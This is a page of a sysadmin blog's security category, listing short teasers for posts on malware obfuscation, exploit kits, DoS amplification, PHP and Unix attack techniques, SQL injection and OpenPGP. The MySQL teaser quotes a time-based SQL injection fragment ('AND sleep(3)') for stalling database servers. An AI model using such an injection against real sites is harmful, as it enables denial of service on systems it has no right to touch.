Sysadmins of the North

Technical blog, where topics include: computer, server, web, sysadmin, MySQL, database, virtualization, optimization and security

Category: Security (page 3 of 5)

An example of evolving obfuscation

Brad Duncan, security researcher at Rackspace, writes about the evolving javascript (malware) obfuscation, on the Internet Storm Center InfoSec Community Forums.

Continue reading

Angler exploit kit uses domain shadowing technique to evade detection

The Hacker News reports that the world’s infamous Angler exploit kit has become the most advanced, much more powerful and the best exploit kit available in the market, beating the infamous BlackHole exploit kit, with a host of exploits including zero-days and a new technique added to it.

Continue reading

Joomla websites abused as open proxy for Denial-of-Service attacks

Joomla websites using the Googlemaps plugin for Joomla are actively abused as open proxy for launching Denial-of-Service (DoS) attacks. Even though the Googlemaps plugin vulnerability plugin_googlemap2_proxy.php was released over one and a half (1,5) years ago, I still see these DoS-attacks happening on a regular basis…

Continue reading

Microsoft warns for PowerPoint OLE 0-day

Security Advisory 3010060 provides additional protections regarding limited, targeted attacks directed at Microsoft Windows customers. A cyberattacker could cause remote code execution if someone is tricked into opening a maliciously-crafted PowerPoint document that contains an infected Object Linking and Embedding (OLE) file.

Continue reading

SSDP amplified reflective DDoS attacks

SSDP amplified reflective DDoS attacks: The Internet Storm Center (ISC) InfoSec Handlers Diary Blog writes about a recent -significant- increase in both scanning for 1900/UDP and a huge increase of 1900/UDP being used for amplified reflective DDOS attacks: 1900/UDP (SSDP) Scanning and DDOS

Continue reading

Exploit PHP’s mail() to get remote code execution

Exploit PHP’s mail() function to perform remote code execution, under rare circumstances.

Continue reading

phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys

A vulnerability in PHP’s phpinfo() function allows PHP scripts to read arbitrary strings from memory.

Continue reading

Old-school: Unix wildcards gone wild

Back To The Future: Unix Wildcards Gone Wild: DefenseCode‘s Leon Juranic released an article explaining an old-school hacking technique: Unix wildcard poisoning attacks. No ASLR bypass, ROP exploits or 0day remote kernel exploits, but if you wonder how basic Unix tools like ‘tar’, ‘chmod’ or ‘chown’ can lead to full system compromise, keep on reading.

Back To The Future: Unix Wildcards Gone Wild

Increase in SQL injection attacks

Summer vacation’s over? More and more SQL injection attacks observed

Since a week or so, I notice a huge increase in SQL injection attacks on various websites. Anyone else seeing the same SQL injection attacks lately? This increased SQL injection activity – on various web sites and databases – has the following characteristics:

Continue reading

WordPress 3.9.2 Security Release fixes XML-RPC DoS

WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately. This release fixes a possible denial of service issue in PHP’s XML processing, reported by Nir Goldshlager of the Salesforce.com Product Security Team. It was fixed by Michael Adams and Andrew Nacin of the WordPress security team and David Rothstein of the Drupal security team. This is the first time our two projects have coordinated on joint security releases.

Continue reading

MySQL sleep() attacks

How to put a MySQL server to sleep()

MySQL sleep() command injection attacks: how not validating your PHP user input can lead to Denial of Service (DoS) attacks against websites and back-end database servers. Simply by putting “AND sleep(3)” in the address bar… Happy SQL injection!

Continue reading

OpenPGP Best Practices

Let’s continue on the PGP (GnuPG, OpenPGP) and email security/privacy topics. Riseup put together an OpenPGP Best Practises guide.

SMTP over Hidden Services with postfix

Into.the.Void. writes:
“This post is about sending SMTP traffic between two servers on the Internet over Tor, that is without someone being able to easily see who is sending what to whom. IMHO, it can be helpful in some situations to certain groups of people.”

Continue reading

Be careful with cheap Chinese Android smartphones – Uupay.D trojan pre-installed

Chinese Android smartphones coming pre-installed with Uupay.D trojan: the cheap Star N9500 Android smartphone comes pre-installed with Uupay.D trojan, reports AmongTech (via Heise.de).

Continue reading

OpenPGP.js – OpenPGP JavaScript Implementation

OpenPGP.js, the OpenPGP JavaScript Implementation deserves some attention! 🙂

Continue reading

« Older posts Newer posts »